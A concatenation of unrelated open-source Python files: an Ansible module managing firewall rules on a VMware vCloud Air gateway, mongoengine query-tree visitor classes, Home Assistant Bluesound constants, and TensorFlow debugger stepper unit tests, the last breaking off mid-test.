# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from . import models
from . import wizard
| InakiZabala/odoomrp-wip | product_pricelist_import/__init__.py | Python | agpl-3.0 | 966 |
#!/usr/bin/python
# Copyright (c) 2015 VMware, Inc. All Rights Reserved.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: vca_fw
short_description: add remove firewall rules in a gateway in a vca
description:
- Adds or removes firewall rules from a gateway in a vca environment
version_added: "2.0"
options:
username:
description:
- The vca username or email address, if not set the environment variable VCA_USER is checked for the username.
required: false
default: None
password:
description:
- The vca password, if not set the environment variable VCA_PASS is checked for the password
required: false
default: None
org:
description:
- The org to login to for creating vapp, mostly set when the service_type is vdc.
required: false
default: None
service_id:
description:
- The service id in a vchs environment to be used for creating the vapp
required: false
default: None
host:
description:
- The authentication host to be used when service type is vcd.
required: false
default: None
api_version:
description:
- The api version to be used with the vca
required: false
default: "5.7"
service_type:
description:
- The type of service we are authenticating against
required: false
default: vca
choices: [ "vca", "vchs", "vcd" ]
state:
description:
- if the object should be added or removed
required: false
default: present
choices: [ "present", "absent" ]
verify_certs:
description:
- If the certificates of the authentication is to be verified
required: false
default: True
vdc_name:
description:
- The name of the vdc where the gateway is located.
required: false
default: None
gateway_name:
description:
- The name of the gateway of the vdc where the rule should be added
required: false
default: gateway
fw_rules:
description:
- A list of firewall rules to be added to the gateway, Please see examples on valid entries
required: True
default: false
'''
EXAMPLES = '''
#Add a set of firewall rules
- hosts: localhost
connection: local
tasks:
- vca_fw:
instance_id: 'b15ff1e5-1024-4f55-889f-ea0209726282'
vdc_name: 'benz_ansible'
state: 'absent'
fw_rules:
- description: "ben testing"
source_ip: "Any"
dest_ip: 192.168.2.11
- description: "ben testing 2"
source_ip: 192.168.2.100
source_port: "Any"
dest_port: "22"
dest_ip: 192.168.2.13
is_enable: "true"
enable_logging: "false"
protocol: "Tcp"
policy: "allow"
'''
import time, json, xmltodict
HAS_PYVCLOUD = False
try:
from pyvcloud.vcloudair import VCA
from pyvcloud.schema.vcd.v1_5.schemas.vcloud.networkType import ProtocolsType
HAS_PYVCLOUD = True
except ImportError:
pass
SERVICE_MAP = {'vca': 'ondemand', 'vchs': 'subscription', 'vcd': 'vcd'}
LOGIN_HOST = {}
LOGIN_HOST['vca'] = 'vca.vmware.com'
LOGIN_HOST['vchs'] = 'vchs.vmware.com'
VALID_RULE_KEYS = ['policy', 'is_enable', 'enable_logging', 'description', 'dest_ip', 'dest_port', 'source_ip', 'source_port', 'protocol']
def vca_login(module=None):
service_type = module.params.get('service_type')
username = module.params.get('username')
password = module.params.get('password')
instance = module.params.get('instance_id')
org = module.params.get('org')
service = module.params.get('service_id')
vdc_name = module.params.get('vdc_name')
version = module.params.get('api_version')
verify = module.params.get('verify_certs')
if not vdc_name:
if service_type == 'vchs':
vdc_name = module.params.get('service_id')
if not org:
if service_type == 'vchs':
if vdc_name:
org = vdc_name
else:
org = service
if service_type == 'vcd':
host = module.params.get('host')
else:
host = LOGIN_HOST[service_type]
if not username:
if 'VCA_USER' in os.environ:
username = os.environ['VCA_USER']
if not password:
if 'VCA_PASS' in os.environ:
password = os.environ['VCA_PASS']
if not username or not password:
module.fail_json(msg = "Either the username or password is not set, please check")
if service_type == 'vchs':
version = '5.6'
if service_type == 'vcd':
if not version:
version == '5.6'
vca = VCA(host=host, username=username, service_type=SERVICE_MAP[service_type], version=version, verify=verify)
if service_type == 'vca':
if not vca.login(password=password):
module.fail_json(msg = "Login Failed: Please check username or password", error=vca.response.content)
if not vca.login_to_instance(password=password, instance=instance, token=None, org_url=None):
s_json = serialize_instances(vca.instances)
module.fail_json(msg = "Login to Instance failed: Seems like instance_id provided is wrong .. Please check",\
valid_instances=s_json)
if not vca.login_to_instance(instance=instance, password=None, token=vca.vcloud_session.token,
org_url=vca.vcloud_session.org_url):
module.fail_json(msg = "Error logging into org for the instance", error=vca.response.content)
return vca
if service_type == 'vchs':
if not vca.login(password=password):
module.fail_json(msg = "Login Failed: Please check username or password", error=vca.response.content)
if not vca.login(token=vca.token):
module.fail_json(msg = "Failed to get the token", error=vca.response.content)
if not vca.login_to_org(service, org):
module.fail_json(msg = "Failed to login to org, Please check the orgname", error=vca.response.content)
return vca
if service_type == 'vcd':
if not vca.login(password=password, org=org):
module.fail_json(msg = "Login Failed: Please check username or password or host parameters")
if not vca.login(password=password, org=org):
module.fail_json(msg = "Failed to get the token", error=vca.response.content)
if not vca.login(token=vca.token, org=org, org_url=vca.vcloud_session.org_url):
module.fail_json(msg = "Failed to login to org", error=vca.response.content)
return vca
def validate_fw_rules(module=None, fw_rules=None):
VALID_PROTO = ['Tcp', 'Udp', 'Icmp', 'Any']
for rule in fw_rules:
if not isinstance(rule, dict):
module.fail_json(msg="Firewall rules must be a list of dictionaries, Please check", valid_keys=VALID_RULE_KEYS)
for k in rule.keys():
if k not in VALID_RULE_KEYS:
module.fail_json(msg="%s is not a valid key in fw rules, Please check above.." %k, valid_keys=VALID_RULE_KEYS)
rule['dest_port'] = rule.get('dest_port', 'Any')
rule['dest_ip'] = rule.get('dest_ip', 'Any')
rule['source_port'] = rule.get('source_port', 'Any')
rule['source_ip'] = rule.get('source_ip', 'Any')
rule['protocol'] = rule.get('protocol', 'Any')
rule['policy'] = rule.get('policy', 'allow')
rule['is_enable'] = rule.get('is_enable', 'true')
rule['enable_logging'] = rule.get('enable_logging', 'false')
rule['description'] = rule.get('description', 'rule added by Ansible')
if not rule['protocol'] in VALID_PROTO:
module.fail_json(msg="the value in protocol is not valid, valid values are as above", valid_proto=VALID_PROTO)
return fw_rules
def create_protocol_list(protocol):
plist = []
plist.append(protocol.get_Tcp())
plist.append(protocol.get_Any())
plist.append(protocol.get_Tcp())
plist.append(protocol.get_Udp())
plist.append(protocol.get_Icmp())
plist.append(protocol.get_Other())
return plist
def create_protocols_type(protocol):
all_protocols = {"Tcp": None, "Udp": None, "Icmp": None, "Any": None}
all_protocols[protocol] = True
return ProtocolsType(**all_protocols)
def main():
module = AnsibleModule(
argument_spec=dict(
username = dict(default=None),
password = dict(default=None),
org = dict(default=None),
service_id = dict(default=None),
instance_id = dict(default=None),
host = dict(default=None),
api_version = dict(default='5.7'),
service_type = dict(default='vca', choices=['vchs', 'vca', 'vcd']),
state = dict(default='present', choices = ['present', 'absent']),
vdc_name = dict(default=None),
gateway_name = dict(default='gateway'),
fw_rules = dict(required=True, default=None, type='list'),
)
)
vdc_name = module.params.get('vdc_name')
org = module.params.get('org')
service = module.params.get('service_id')
state = module.params.get('state')
service_type = module.params.get('service_type')
host = module.params.get('host')
instance_id = module.params.get('instance_id')
fw_rules = module.params.get('fw_rules')
gateway_name = module.params.get('gateway_name')
verify_certs = dict(default=True, type='bool'),
if not HAS_PYVCLOUD:
module.fail_json(msg="python module pyvcloud is needed for this module")
if service_type == 'vca':
if not instance_id:
module.fail_json(msg="When service type is vca the instance_id parameter is mandatory")
if not vdc_name:
module.fail_json(msg="When service type is vca the vdc_name parameter is mandatory")
if service_type == 'vchs':
if not service:
module.fail_json(msg="When service type vchs the service_id parameter is mandatory")
if not org:
org = service
if not vdc_name:
vdc_name = service
if service_type == 'vcd':
if not host:
module.fail_json(msg="When service type is vcd host parameter is mandatory")
vca = vca_login(module)
vdc = vca.get_vdc(vdc_name)
if not vdc:
module.fail_json(msg = "Error getting the vdc, Please check the vdc name")
mod_rules = validate_fw_rules(module, fw_rules)
gateway = vca.get_gateway(vdc_name, gateway_name)
if not gateway:
module.fail_json(msg="Not able to find the gateway %s, please check the gateway_name param" %gateway_name)
rules = gateway.get_fw_rules()
existing_rules = []
del_rules = []
for rule in rules:
current_trait = (create_protocol_list(rule.get_Protocols()),
rule.get_DestinationPortRange(),
rule.get_DestinationIp(),
rule.get_SourcePortRange(),
rule.get_SourceIp())
for idx, val in enumerate(mod_rules):
trait = (create_protocol_list(create_protocols_type(val['protocol'])),
val['dest_port'], val['dest_ip'], val['source_port'], val['source_ip'])
if current_trait == trait:
del_rules.append(mod_rules[idx])
mod_rules.pop(idx)
existing_rules.append(current_trait)
if state == 'absent':
if len(del_rules) < 1:
module.exit_json(changed=False, msg="Nothing to delete", delete_rules=mod_rules)
else:
for i in del_rules:
gateway.delete_fw_rule(i['protocol'], i['dest_port'], i['dest_ip'], i['source_port'], i['source_ip'])
task = gateway.save_services_configuration()
if not task:
module.fail_json(msg="Unable to Delete Rule, please check above error", error=gateway.response.content)
if not vca.block_until_completed(task):
module.fail_json(msg="Error while waiting to remove Rule, please check above error", error=gateway.response.content)
module.exit_json(changed=True, msg="Rules Deleted", deleted_rules=del_rules)
if len(mod_rules) < 1:
module.exit_json(changed=False, rules=existing_rules)
if len(mod_rules) >= 1:
for i in mod_rules:
gateway.add_fw_rule(i['is_enable'], i['description'], i['policy'], i['protocol'], i['dest_port'], i['dest_ip'],
i['source_port'], i['source_ip'], i['enable_logging'])
task = gateway.save_services_configuration()
if not task:
module.fail_json(msg="Unable to Add Rule, please check above error", error=gateway.response.content)
if not vca.block_until_completed(task):
module.fail_json(msg="Failure in waiting for adding firewall rule", error=gateway.response.content)
module.exit_json(changed=True, rules=mod_rules)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| muffl0n/ansible-modules-extras | cloud/vmware/vca_fw.py | Python | gpl-3.0 | 14,207 |
import copy
from mongoengine.errors import InvalidQueryError
from mongoengine.queryset import transform
__all__ = ('Q',)
class QNodeVisitor(object):
"""Base visitor class for visiting Q-object nodes in a query tree.
"""
def visit_combination(self, combination):
"""Called by QCombination objects.
"""
return combination
def visit_query(self, query):
"""Called by (New)Q objects.
"""
return query
class DuplicateQueryConditionsError(InvalidQueryError):
pass
class SimplificationVisitor(QNodeVisitor):
"""Simplifies query trees by combining unnecessary 'and' connection nodes
into a single Q-object.
"""
def visit_combination(self, combination):
if combination.operation == combination.AND:
# The simplification only applies to 'simple' queries
if all(isinstance(node, Q) for node in combination.children):
queries = [n.query for n in combination.children]
try:
return Q(**self._query_conjunction(queries))
except DuplicateQueryConditionsError:
# Cannot be simplified
pass
return combination
def _query_conjunction(self, queries):
"""Merges query dicts - effectively &ing them together.
"""
query_ops = set()
combined_query = {}
for query in queries:
ops = set(query.keys())
# Make sure that the same operation isn't applied more than once
# to a single field
intersection = ops.intersection(query_ops)
if intersection:
raise DuplicateQueryConditionsError()
query_ops.update(ops)
combined_query.update(copy.deepcopy(query))
return combined_query
class QueryCompilerVisitor(QNodeVisitor):
"""Compiles the nodes in a query tree to a PyMongo-compatible query
dictionary.
"""
def __init__(self, document):
self.document = document
def visit_combination(self, combination):
operator = "$and"
if combination.operation == combination.OR:
operator = "$or"
return {operator: combination.children}
def visit_query(self, query):
return transform.query(self.document, **query.query)
class QNode(object):
"""Base class for nodes in query trees.
"""
AND = 0
OR = 1
def to_query(self, document):
query = self.accept(SimplificationVisitor())
query = query.accept(QueryCompilerVisitor(document))
return query
def accept(self, visitor):
raise NotImplementedError
def _combine(self, other, operation):
"""Combine this node with another node into a QCombination object.
"""
if getattr(other, 'empty', True):
return self
if self.empty:
return other
return QCombination(operation, [self, other])
@property
def empty(self):
return False
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
class QCombination(QNode):
"""Represents the combination of several conditions by a given logical
operator.
"""
def __init__(self, operation, children):
self.operation = operation
self.children = []
for node in children:
# If the child is a combination of the same type, we can merge its
# children directly into this combinations children
if isinstance(node, QCombination) and node.operation == operation:
self.children += node.children
else:
self.children.append(node)
def accept(self, visitor):
for i in range(len(self.children)):
if isinstance(self.children[i], QNode):
self.children[i] = self.children[i].accept(visitor)
return visitor.visit_combination(self)
@property
def empty(self):
return not bool(self.children)
class Q(QNode):
"""A simple query object, used in a query tree to build up more complex
query structures.
"""
def __init__(self, **query):
self.query = query
def accept(self, visitor):
return visitor.visit_query(self)
@property
def empty(self):
return not bool(self.query)
| elioth010/lugama | venv/lib/python2.7/site-packages/mongoengine/queryset/visitor.py | Python | gpl-2.0 | 4,434 |
"""Constants for the Bluesound HiFi wireless speakers and audio integrations component."""
DOMAIN = "bluesound"
SERVICE_CLEAR_TIMER = "clear_sleep_timer"
SERVICE_JOIN = "join"
SERVICE_SET_TIMER = "set_sleep_timer"
SERVICE_UNJOIN = "unjoin"
| nkgilley/home-assistant | homeassistant/components/bluesound/const.py | Python | apache-2.0 | 240 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests of the tfdbg Stepper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.client import session
from tensorflow.python.debug.lib.stepper import NodeStepper
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
class StepperTest(test_util.TensorFlowTestCase):
def setUp(self):
self.a = variables.Variable(2.0, name="a")
self.b = variables.Variable(3.0, name="b")
self.c = math_ops.multiply(self.a, self.b, name="c") # Should be 6.0.
self.d = math_ops.multiply(self.a, self.a, name="d") # Should be 4.0.
self.e = math_ops.multiply(self.d, self.c, name="e") # Should be 24.0.
self.f_y = constant_op.constant(0.30, name="f_y")
self.f = math_ops.div(self.b, self.f_y, name="f") # Should be 10.0.
# The there nodes x, y and z form a graph with "cross-links" in. I.e., x
# and y are both direct inputs to z, but x is also a direct input to y.
self.x = variables.Variable(2.0, name="x") # Should be 2.0
self.y = math_ops.negative(self.x, name="y") # Should be -2.0.
self.z = math_ops.multiply(self.x, self.y, name="z") # Should be -4.0.
self.sess = session.Session()
self.sess.run(variables.global_variables_initializer())
def tearDown(self):
ops.reset_default_graph()
def testContToFetchNotInTransitiveClosureShouldError(self):
with NodeStepper(self.sess, "e:0") as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(7, len(sorted_nodes))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("a/read"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("b/read"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("d"))
self.assertLess(sorted_nodes.index("d"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("c"), sorted_nodes.index("e"))
self.assertSetEqual(
{"e:0", "d:0", "c:0", "a/read:0", "b/read:0", "b:0", "a:0"},
set(stepper.closure_elements()))
with self.assertRaisesRegexp(
ValueError,
"Target \"f:0\" is not in the transitive closure for the fetch of "
"the stepper"):
stepper.cont("f:0")
def testContToNodeNameShouldReturnTensorValue(self):
with NodeStepper(self.sess, "e:0") as stepper:
self.assertAllClose(6.0, stepper.cont("c"))
def testUsingNamesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, "e:0") as stepper:
# The first cont() call should have used no feeds.
result = stepper.cont("c:0")
self.assertAllClose(6.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertEqual({}, stepper.last_feed_types())
# The second cont() call should have used the tensor handle from the
# previous cont() call.
result = stepper.cont("e:0")
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(4.0, stepper.get_tensor_value("d:0"))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testUsingNodesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, self.e) as stepper:
# There should be no handles before any cont() calls.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
# Before the cont() call, the stepper should not have access to the value
# of c:0.
with self.assertRaisesRegexp(
ValueError,
"This stepper instance does not have access to the value of tensor "
"\"c:0\""):
stepper.get_tensor_value("c:0")
# Using the node/tensor itself, instead of the name str, should work on
# cont().
result = stepper.cont(self.c)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertEqual(["c:0"], stepper.handle_names())
self.assertEqual({"c"}, stepper.handle_node_names())
# After the cont() call, the stepper should have access to the value of
# c:0 via a tensor handle.
self.assertAllClose(6.0, stepper.get_tensor_value("c:0"))
result = stepper.cont(self.e)
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
stepper.intermediate_tensor_names())
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testContToTensorWithIntermediateDumpShouldUseDump(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(2.0, stepper.cont("a/read:0"))
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
self.assertAllClose(10.0, stepper.cont("f:0"))
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
def testDisablingUseDumpedIntermediatesWorks(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(10.0,
stepper.cont("f:0", use_dumped_intermediates=False))
self.assertEqual({}, stepper.last_feed_types())
def testIsFeedableShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.e) as stepper:
self.assertTrue(stepper.is_feedable("a/read:0"))
self.assertTrue(stepper.is_feedable("b/read:0"))
self.assertTrue(stepper.is_feedable("c:0"))
self.assertTrue(stepper.is_feedable("d:0"))
def testOverrideValue(self):
with NodeStepper(self.sess, self.e) as stepper:
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
# There should be no overrides before any cont() calls.
self.assertEqual([], stepper.override_names())
# Calling cont() on c again should lead to use of the handle.
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
# Override c:0.
stepper.override_tensor("c:0", 7.0)
# After the overriding, calling get_tensor_value() on c:0 should yield the
# overriding value.
self.assertEqual(7.0, stepper.get_tensor_value("c:0"))
# Now c:0 should have only an override value, but no cached handle,
# because the handle should have been invalidated.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
# Run a downstream tensor after the value override.
result = stepper.cont(self.e)
self.assertAllClose(28.0, result) # Should reflect the overriding value.
# Should use override, instead of the handle.
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testOverrideValueTwice(self):
with NodeStepper(self.sess, self.e) as stepper:
# Override once.
stepper.override_tensor("c:0", 7.0)
self.assertAllClose(28.0, stepper.cont(self.e))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
self.assertEqual(["e:0"], stepper.handle_names())
self.assertSetEqual({"e"}, stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
# Calling cont(self.e) again. This time the cached tensor handle of e
# should be used.
self.assertEqual(28.0, stepper.cont(self.e))
self.assertEqual({
"e:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
# Override c again. This should have invalidated the cache for e.
stepper.override_tensor("c:0", 8.0)
self.assertEqual([], stepper.handle_names())
self.assertEqual(set(), stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
self.assertAllClose(32.0, stepper.cont(self.e))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE,
"d:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testRemoveOverrideValue(self):
with NodeStepper(self.sess, self.e) as stepper:
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
# The previous cont() step should have generated a cached tensor handle.
self.assertEqual(["c:0"], stepper.handle_names())
self.assertSetEqual({"c"}, stepper.handle_node_names())
# Override c:0.
stepper.override_tensor("c:0", 7.0)
# The overriding should have invalidated the tensor handle.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
self.assertEqual(["c:0"], stepper.override_names())
result = stepper.cont(self.e)
self.assertAllClose(28.0, result) # Should reflect the overriding value.
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
# The handle to tensor e:0 should have been cached, even though its
# transitive closure contains an override.
self.assertIn("e:0", stepper.handle_names())
self.assertSetEqual({"e"}, stepper.handle_node_names())
# Remove the override.
stepper.remove_override("c:0")
# c:0 should not be in the overrides anymore.
self.assertEqual([], stepper.override_names())
# Removing the override should have invalidated the tensor handle for c.
self.assertNotIn("e:0", stepper.handle_names())
self.assertNotIn("e", stepper.handle_node_names())
# Should reflect the non-overriding value.
self.assertAllClose(24.0, stepper.cont(self.e))
# This time, the handle to tensor e:0 should have been cached again, even
# thought its transitive closure contains an override.
self.assertIn("e:0", stepper.handle_names())
self.assertIn("e", stepper.handle_node_names())
# Calling cont(self.e) again should have used the tensor handle to e:0.
self.assertAllClose(24.0, stepper.cont(self.e))
self.assertEqual({
"e:0": NodeStepper.FEED_TYPE_HANDLE,
}, stepper.last_feed_types())
def testOverrideAndContToSameTensor(self):
with NodeStepper(self.sess, self.e) as stepper:
result = stepper.cont(self.c)
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertEqual(["c:0"], stepper.handle_names())
self.assertSetEqual({"c"}, stepper.handle_node_names())
self.assertAllClose(6.0, stepper.cont(self.c))
# The last cont() call should use the tensor handle directly.
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
# Override c:0.
stepper.override_tensor("c:0", 7.0)
# As a result of the override, the tensor handle should have been
# invalidated.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
result = stepper.cont(self.c)
self.assertAllClose(7.0, result)
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
def testFinalizeWithPreviousOverrides(self):
with NodeStepper(self.sess, self.e) as stepper:
stepper.override_tensor("a/read:0", 20.0)
self.assertEqual(["a/read:0"], stepper.override_names())
# Should reflect the overriding value.
self.assertAllClose(24000.0, stepper.cont("e:0"))
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
# Finalize call should have ignored the overriding value.
self.assertAllClose(24.0, stepper.finalize())
def testRemoveNonexistentOverrideValue(self):
with NodeStepper(self.sess, self.e) as stepper:
self.assertEqual([], stepper.override_names())
with self.assertRaisesRegexp(
ValueError, "No overriding value exists for tensor \"c:0\""):
stepper.remove_override("c:0")
def testAttemptToOverrideInvalidTensor(self):
stepper = NodeStepper(self.sess, self.e)
with self.assertRaisesRegexp(ValueError, "Cannot override tensor \"f:0\""):
stepper.override_tensor("f:0", 42.0)
def testInvalidOverrideArgumentType(self):
with NodeStepper(self.sess, self.e) as stepper:
with self.assertRaisesRegexp(TypeError, "Expected type str; got type"):
stepper.override_tensor(self.a, 42.0)
def testTransitiveClosureWithCrossLinksShouldHaveCorrectOrder(self):
with NodeStepper(self.sess, "z:0") as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(4, len(sorted_nodes))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("x/read"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("y"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("z"))
self.assertLess(sorted_nodes.index("y"), sorted_nodes.index("z"))
def testNodeStepperConstructorShouldAllowListOrTupleOrDictOfFetches(self):
for i in range(6):
if i == 0:
fetches = [self.e, [self.f, self.z]]
elif i == 1:
fetches = (self.e, (self.f, self.z))
elif i == 2:
fetches = {"e": self.e, "fz": {"f": self.f, "z": self.z}}
elif i == 3:
fetches = ["e:0", ["f:0", "z:0"]]
elif i == 4:
fetches = ("e:0", ("f:0", "z:0"))
elif i == 5:
fetches = {"e": "e:0", "fz": {"f": "f:0", "z": "z:0"}}
with NodeStepper(self.sess, fetches) as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(13, len(sorted_nodes))
# Check the topological order of the sorted nodes.
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("x/read"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("y"))
self.assertLess(sorted_nodes.index("x"), sorted_nodes.index("z"))
self.assertLess(sorted_nodes.index("y"), sorted_nodes.index("z"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("a/read"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("b/read"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("d"))
self.assertLess(sorted_nodes.index("d"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("c"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("f"))
self.assertLess(sorted_nodes.index("f_y"), sorted_nodes.index("f"))
closure_elements = stepper.closure_elements()
self.assertIn("x/read:0", closure_elements)
self.assertIn("e:0", closure_elements)
self.assertIn("f:0", closure_elements)
self.assertEqual([0], stepper.output_slots_in_closure("x/read"))
self.assertEqual([0], stepper.output_slots_in_closure("e"))
self.assertEqual([0], stepper.output_slots_in_closure("f"))
result = stepper.finalize()
if i == 0 or i == 1 or i == 3 or i == 4:
self.assertAllClose(24.0, result[0])
self.assertAllClose(10.0, result[1][0])
self.assertAllClose(-4.0, result[1][1])
elif i == 2 or i == 5:
self.assertAllClose(24.0, result["e"])
self.assertAllClose(10.0, result["fz"]["f"])
self.assertAllClose(-4.0, result["fz"]["z"])
class StepperTestWithPlaceHolders(test_util.TensorFlowTestCase):
def setUp(self):
self.ph0 = array_ops.placeholder(dtypes.float32, shape=(2, 2), name="ph0")
self.ph1 = array_ops.placeholder(dtypes.float32, shape=(2, 1), name="ph1")
self.x = math_ops.matmul(self.ph0, self.ph1, name="x")
self.y = math_ops.add(self.x, self.ph1, name="y")
self.sess = session.Session()
def tearDown(self):
ops.reset_default_graph()
def testGetTensorValueWorksOnPlaceholder(self):
with NodeStepper(
self.sess,
self.y,
feed_dict={
self.ph0: [[1.0, 2.0], [-3.0, 5.0]],
self.ph1: [[-1.0], [0.5]]
}) as stepper:
self.assertAllClose([[1.0, 2.0], [-3.0, 5.0]],
stepper.get_tensor_value("ph0"))
self.assertAllClose([[1.0, 2.0], [-3.0, 5.0]],
stepper.get_tensor_value("ph0:0"))
with self.assertRaisesRegexp(
KeyError,
r"The name 'ph0:1' refers to a Tensor which does not exist"):
stepper.get_tensor_value("ph0:1")
def testIsPlaceholdersShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.y) as stepper:
self.assertTrue(stepper.is_placeholder(self.ph0.name))
self.assertTrue(stepper.is_placeholder(self.ph1.name))
self.assertFalse(stepper.is_placeholder(self.x.name))
self.assertFalse(stepper.is_placeholder(self.y.name))
with self.assertRaisesRegexp(ValueError,
"A is not in the transitive closure"):
self.assertFalse(stepper.is_placeholder("A"))
def testPlaceholdersShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.y) as stepper:
self.assertSetEqual({"ph0", "ph1"}, set(stepper.placeholders()))
def testContWithPlaceholders(self):
with NodeStepper(
self.sess,
self.y,
feed_dict={
self.ph0: [[1.0, 2.0], [-3.0, 5.0]],
self.ph1: [[-1.0], [0.5]]
}) as stepper:
